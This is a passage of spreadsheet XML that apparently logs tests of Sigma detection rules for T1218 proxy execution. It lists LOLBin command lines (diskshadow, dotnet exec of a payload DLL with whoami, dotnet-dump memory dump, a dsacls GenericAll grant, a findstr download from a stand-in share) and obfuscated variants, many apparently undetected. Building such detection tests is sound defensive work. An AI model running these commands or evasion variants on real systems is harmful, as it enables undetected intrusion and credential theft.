        </is>
      </c>
      <c r="D3635" s="44" t="inlineStr">
        <is>
          <t>1dde5376-a648-492e-9e54-4241dd9b0c7f</t>
        </is>
      </c>
      <c r="E3635" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c diskshadow.exe -s^  C:\Temp\script.dsh</t>
        </is>
      </c>
      <c r="F3635" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3635" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3635" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3635" s="44" t="n"/>
      <c r="J3635" s="44" t="n"/>
      <c r="K3635" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3636" ht="15.75" customHeight="1" s="42">
      <c r="A3636" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3636" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_ext</t>
        </is>
      </c>
      <c r="C3636" s="44" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D3636" s="44" t="inlineStr">
        <is>
          <t>1dde5376-a648-492e-9e54-4241dd9b0c7f</t>
        </is>
      </c>
      <c r="E3636" s="44" t="inlineStr">
        <is>
          <t>diskshadow.exe	-s	C:\Temp\script.dsh</t>
        </is>
      </c>
      <c r="F3636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3636" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3636" s="44" t="n"/>
      <c r="J3636" s="44" t="n"/>
      <c r="K3636" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3637" ht="15.75" customHeight="1" s="42">
      <c r="A3637" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3637" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_ext</t>
        </is>
      </c>
      <c r="C3637" s="44" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Uncommon Script Extension Execution</t>
        </is>
      </c>
      <c r="D3637" s="44" t="inlineStr">
        <is>
          <t>1dde5376-a648-492e-9e54-4241dd9b0c7f</t>
        </is>
      </c>
      <c r="E3637" s="44" t="inlineStr">
        <is>
          <t>diskshadow.exe -s C:\Temp\script.txt.dsh</t>
        </is>
      </c>
      <c r="F3637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3637" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3637" s="44" t="n"/>
      <c r="J3637" s="44" t="n"/>
      <c r="K3637" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3638" ht="15.75" customHeight="1" s="42">
      <c r="A3638" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3638" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C3638" s="44" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3638" s="44" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E3638" s="44" t="inlineStr">
        <is>
          <t>diskshadow.exe /s C:\Temp\script.txt</t>
        </is>
      </c>
      <c r="F3638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3638" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3638" s="44" t="n"/>
      <c r="J3638" s="44" t="n"/>
      <c r="K3638" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3639" ht="15.75" customHeight="1" s="42">
      <c r="A3639" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3639" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C3639" s="44" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3639" s="44" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E3639" s="44" t="inlineStr">
        <is>
          <t>diskshadow.exe "-s" C:\Temp\script.txt</t>
        </is>
      </c>
      <c r="F3639" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3639" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3639" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3639" s="44" t="n"/>
      <c r="J3639" s="44" t="n"/>
      <c r="K3639" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3640" ht="15.75" customHeight="1" s="42">
      <c r="A3640" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3640" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C3640" s="44" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3640" s="44" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E3640" s="44" t="inlineStr">
        <is>
          <t>diskshadow.exe	-s	C:\Temp\script.txt</t>
        </is>
      </c>
      <c r="F3640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3640" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3640" s="44" t="n"/>
      <c r="J3640" s="44" t="n"/>
      <c r="K3640" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3641" ht="15.75" customHeight="1" s="42">
      <c r="A3641" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3641" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_diskshadow_script_mode_susp_location</t>
        </is>
      </c>
      <c r="C3641" s="44" t="inlineStr">
        <is>
          <t>Diskshadow Script Mode - Execution From Potential Suspicious Location</t>
        </is>
      </c>
      <c r="D3641" s="44" t="inlineStr">
        <is>
          <t>fa1a7e52-3d02-435b-81b8-00da14dd66c1</t>
        </is>
      </c>
      <c r="E3641" s="44" t="inlineStr">
        <is>
          <t>diskshadow.exe -s C:\Temp\..\Temp\script.txt</t>
        </is>
      </c>
      <c r="F3641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3641" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3641" s="44" t="n"/>
      <c r="J3641" s="44" t="n"/>
      <c r="K3641" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3642" ht="15.75" customHeight="1" s="42">
      <c r="A3642" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3642" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_arbitrary_dll_csproj_execution</t>
        </is>
      </c>
      <c r="C3642" s="44" t="inlineStr">
        <is>
          <t>Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE</t>
        </is>
      </c>
      <c r="D3642" s="44" t="inlineStr">
        <is>
          <t>d80d5c81-04ba-45b4-84e4-92eba40e0ad3</t>
        </is>
      </c>
      <c r="E3642" s="44" t="inlineStr">
        <is>
          <t>dotnet.exe exec C:\Temp\payload.dll</t>
        </is>
      </c>
      <c r="F3642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3642" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3642" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3642" s="44" t="inlineStr">
        <is>
          <t>Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE (d80d5c81-04ba-45b4-84e4-92eba40e0ad3)</t>
        </is>
      </c>
      <c r="J3642" s="44" t="n"/>
      <c r="K3642" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3643" ht="15.75" customHeight="1" s="42">
      <c r="A3643" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3643" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_arbitrary_dll_csproj_execution</t>
        </is>
      </c>
      <c r="C3643" s="44" t="inlineStr">
        <is>
          <t>Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE</t>
        </is>
      </c>
      <c r="D3643" s="44" t="inlineStr">
        <is>
          <t>d80d5c81-04ba-45b4-84e4-92eba40e0ad3</t>
        </is>
      </c>
      <c r="E3643" s="44" t="inlineStr">
        <is>
          <t>dotnet.exe exec C:\Temp\payload.dll &amp; whoami</t>
        </is>
      </c>
      <c r="F3643" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3643" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3643" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073)</t>
        </is>
      </c>
      <c r="J3643" s="44" t="n"/>
      <c r="K3643" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3644" ht="15.75" customHeight="1" s="42">
      <c r="A3644" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3644" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C3644" s="44" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D3644" s="44" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E3644" s="44" t="inlineStr">
        <is>
          <t>dotnet-trace.exe collect --	calc.exe</t>
        </is>
      </c>
      <c r="F3644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3644" s="44" t="n"/>
      <c r="J3644" s="44" t="n"/>
      <c r="K3644" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3645" ht="15.75" customHeight="1" s="42">
      <c r="A3645" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3645" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C3645" s="44" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D3645" s="44" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E3645" s="44" t="inlineStr">
        <is>
          <t>dotnet-trace.exe "collect" -- calc.exe</t>
        </is>
      </c>
      <c r="F3645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3645" s="44" t="n"/>
      <c r="J3645" s="44" t="n"/>
      <c r="K3645" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3646" ht="15.75" customHeight="1" s="42">
      <c r="A3646" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3646" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C3646" s="44" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D3646" s="44" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E3646" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c dotnet-trace.exe col^lect -- calc.exe</t>
        </is>
      </c>
      <c r="F3646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3646" s="44" t="n"/>
      <c r="J3646" s="44" t="n"/>
      <c r="K3646" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3647" ht="15.75" customHeight="1" s="42">
      <c r="A3647" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3647" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C3647" s="44" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D3647" s="44" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E3647" s="44" t="inlineStr">
        <is>
          <t>dotnet-trace.exe -- calc.exe collect</t>
        </is>
      </c>
      <c r="F3647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3647" s="44" t="n"/>
      <c r="J3647" s="44" t="n"/>
      <c r="K3647" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3648" ht="15.75" customHeight="1" s="42">
      <c r="A3648" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3648" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnetdump_memory_dump</t>
        </is>
      </c>
      <c r="C3648" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Dotnet-Dump</t>
        </is>
      </c>
      <c r="D3648" s="44" t="inlineStr">
        <is>
          <t>53d8d3e1-ca33-4012-adf3-e05a4d652e34</t>
        </is>
      </c>
      <c r="E3648" s="44" t="inlineStr">
        <is>
          <t>dotnet-dump.exe "collect" -p 788</t>
        </is>
      </c>
      <c r="F3648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3648" s="44" t="n"/>
      <c r="J3648" s="44" t="n"/>
      <c r="K3648" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3649" ht="15.75" customHeight="1" s="42">
      <c r="A3649" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3649" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnetdump_memory_dump</t>
        </is>
      </c>
      <c r="C3649" s="44" t="inlineStr">
        <is>
          <t>Process Memory Dump Via Dotnet-Dump</t>
        </is>
      </c>
      <c r="D3649" s="44" t="inlineStr">
        <is>
          <t>53d8d3e1-ca33-4012-adf3-e05a4d652e34</t>
        </is>
      </c>
      <c r="E3649" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c dotnet-dump.exe col^lect -p 788</t>
        </is>
      </c>
      <c r="F3649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3649" s="44" t="n"/>
      <c r="J3649" s="44" t="n"/>
      <c r="K3649" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3650" ht="15.75" customHeight="1" s="42">
      <c r="A3650" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3650" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_abuse_permissions</t>
        </is>
      </c>
      <c r="C3650" s="44" t="inlineStr">
        <is>
          <t>Potentially Over Permissive Permissions Granted Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D3650" s="44" t="inlineStr">
        <is>
          <t>01c42d3c-242d-4655-85b2-34f1739632f7</t>
        </is>
      </c>
      <c r="E3650" s="44" t="inlineStr">
        <is>
          <t>dsacls.exe "OU=Sales,DC=domain,DC=com" "/G" "domain\user:GA"</t>
        </is>
      </c>
      <c r="F3650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3650" s="44" t="n"/>
      <c r="J3650" s="44" t="n"/>
      <c r="K3650" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3651" ht="15.75" customHeight="1" s="42">
      <c r="A3651" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3651" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_abuse_permissions</t>
        </is>
      </c>
      <c r="C3651" s="44" t="inlineStr">
        <is>
          <t>Potentially Over Permissive Permissions Granted Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D3651" s="44" t="inlineStr">
        <is>
          <t>01c42d3c-242d-4655-85b2-34f1739632f7</t>
        </is>
      </c>
      <c r="E3651" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c dsacls.exe "OU=Sales,DC=domain,DC=com" /G^  "domain\user:GA"</t>
        </is>
      </c>
      <c r="F3651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3651" s="44" t="n"/>
      <c r="J3651" s="44" t="n"/>
      <c r="K3651" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3652" ht="15.75" customHeight="1" s="42">
      <c r="A3652" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3652" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_abuse_permissions</t>
        </is>
      </c>
      <c r="C3652" s="44" t="inlineStr">
        <is>
          <t>Potentially Over Permissive Permissions Granted Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D3652" s="44" t="inlineStr">
        <is>
          <t>01c42d3c-242d-4655-85b2-34f1739632f7</t>
        </is>
      </c>
      <c r="E3652" s="44" t="inlineStr">
        <is>
          <t>dsacls.exe "OU=Sales,DC=domain,DC=com"\t/G\t"domain\user:GA"</t>
        </is>
      </c>
      <c r="F3652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3652" s="44" t="n"/>
      <c r="J3652" s="44" t="n"/>
      <c r="K3652" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3653" ht="15.75" customHeight="1" s="42">
      <c r="A3653" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3653" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dsacls_abuse_permissions</t>
        </is>
      </c>
      <c r="C3653" s="44" t="inlineStr">
        <is>
          <t>Potentially Over Permissive Permissions Granted Using Dsacls.EXE</t>
        </is>
      </c>
      <c r="D3653" s="44" t="inlineStr">
        <is>
          <t>01c42d3c-242d-4655-85b2-34f1739632f7</t>
        </is>
      </c>
      <c r="E3653" s="44" t="inlineStr">
        <is>
          <t>dsacls.exe "OU=Sales,DC=domain,DC=com" /G "domain\user:G""A"</t>
        </is>
      </c>
      <c r="F3653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3653" s="44" t="n"/>
      <c r="J3653" s="44" t="n"/>
      <c r="K3653" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3654" ht="15.75" customHeight="1" s="42">
      <c r="A3654" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3654" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dxcap_arbitrary_binary_execution</t>
        </is>
      </c>
      <c r="C3654" s="44" t="inlineStr">
        <is>
          <t>New Capture Session Launched Via DXCap.EXE</t>
        </is>
      </c>
      <c r="D3654" s="44" t="inlineStr">
        <is>
          <t>60f16a96-db70-42eb-8f76-16763e333590</t>
        </is>
      </c>
      <c r="E3654" s="44" t="inlineStr">
        <is>
          <t>DXCap.exe /c calc.exe</t>
        </is>
      </c>
      <c r="F3654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3654" s="44" t="n"/>
      <c r="J3654" s="44" t="n"/>
      <c r="K3654" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3655" ht="15.75" customHeight="1" s="42">
      <c r="A3655" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3655" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dxcap_arbitrary_binary_execution</t>
        </is>
      </c>
      <c r="C3655" s="44" t="inlineStr">
        <is>
          <t>New Capture Session Launched Via DXCap.EXE</t>
        </is>
      </c>
      <c r="D3655" s="44" t="inlineStr">
        <is>
          <t>60f16a96-db70-42eb-8f76-16763e333590</t>
        </is>
      </c>
      <c r="E3655" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c DXCap.exe -c^  calc.exe</t>
        </is>
      </c>
      <c r="F3655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3655" s="44" t="n"/>
      <c r="J3655" s="44" t="n"/>
      <c r="K3655" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3656" ht="15.75" customHeight="1" s="42">
      <c r="A3656" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3656" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dxcap_arbitrary_binary_execution</t>
        </is>
      </c>
      <c r="C3656" s="44" t="inlineStr">
        <is>
          <t>New Capture Session Launched Via DXCap.EXE</t>
        </is>
      </c>
      <c r="D3656" s="44" t="inlineStr">
        <is>
          <t>60f16a96-db70-42eb-8f76-16763e333590</t>
        </is>
      </c>
      <c r="E3656" s="44" t="inlineStr">
        <is>
          <t>DXCap.exe\t-c\tcalc.exe</t>
        </is>
      </c>
      <c r="F3656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3656" s="44" t="n"/>
      <c r="J3656" s="44" t="n"/>
      <c r="K3656" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3657" ht="15.75" customHeight="1" s="42">
      <c r="A3657" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3657" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dxcap_arbitrary_binary_execution</t>
        </is>
      </c>
      <c r="C3657" s="44" t="inlineStr">
        <is>
          <t>New Capture Session Launched Via DXCap.EXE</t>
        </is>
      </c>
      <c r="D3657" s="44" t="inlineStr">
        <is>
          <t>60f16a96-db70-42eb-8f76-16763e333590</t>
        </is>
      </c>
      <c r="E3657" s="44" t="inlineStr">
        <is>
          <t>DXCap.exe  -c  calc.exe</t>
        </is>
      </c>
      <c r="F3657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3657" s="44" t="n"/>
      <c r="J3657" s="44" t="n"/>
      <c r="K3657" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3658" ht="15.75" customHeight="1" s="42">
      <c r="A3658" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3658" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C3658" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D3658" s="44" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E3658" s="44" t="inlineStr">
        <is>
          <t>expand "C:\Users\thaim\AppData\Local\Temp\art-expand-test.cab" /F:* .</t>
        </is>
      </c>
      <c r="F3658" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3658" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J3658" s="44" t="n"/>
      <c r="K3658" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3659" ht="15.75" customHeight="1" s="42">
      <c r="A3659" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3659" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C3659" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D3659" s="44" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E3659" s="44" t="inlineStr">
        <is>
          <t>expand "C:\Users\thaim\AppData\Local\Temp\art-expand-test.cab" "-F:*" .</t>
        </is>
      </c>
      <c r="F3659" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3659" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J3659" s="44" t="n"/>
      <c r="K3659" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3660" ht="15.75" customHeight="1" s="42">
      <c r="A3660" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3660" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C3660" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D3660" s="44" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E3660" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c expand "C:\Users\thaim\AppData\Local\Temp\art-expand-test.cab" -F^:* .</t>
        </is>
      </c>
      <c r="F3660" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3660" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J3660" s="44" t="n"/>
      <c r="K3660" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3661" ht="15.75" customHeight="1" s="42">
      <c r="A3661" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3661" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_expand_cabinet_files</t>
        </is>
      </c>
      <c r="C3661" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion</t>
        </is>
      </c>
      <c r="D3661" s="44" t="inlineStr">
        <is>
          <t>9f107a84-532c-41af-b005-8d12a607639f</t>
        </is>
      </c>
      <c r="E3661" s="44" t="inlineStr">
        <is>
          <t>expand "C:\Users\thaim\AppData\Local\Temp\..\Temp\art-expand-test.cab" -F:* .</t>
        </is>
      </c>
      <c r="F3661" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3661" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Cabinet File Expansion (9f107a84-532c-41af-b005-8d12a607639f)</t>
        </is>
      </c>
      <c r="J3661" s="44" t="n"/>
      <c r="K3661" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3662" ht="15.75" customHeight="1" s="42">
      <c r="A3662" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B3662" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_findstr_download</t>
        </is>
      </c>
      <c r="C3662" s="44" t="inlineStr">
        <is>
          <t>Remote File Download Via Findstr.EXE</t>
        </is>
      </c>
      <c r="D3662" s="44" t="inlineStr">
        <is>
          <t>587254ee-a24b-4335-b3cd-065c0f1f4baa</t>
        </is>
      </c>
      <c r="E3662" s="44" t="inlineStr">
        <is>
          <t>findstr.exe /v /l "TEST-HOST" \\example.com\share\test.txt</t>
        </is>
      </c>
      <c r="F3662" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3662" s="44" t="inlineStr">
        <is>
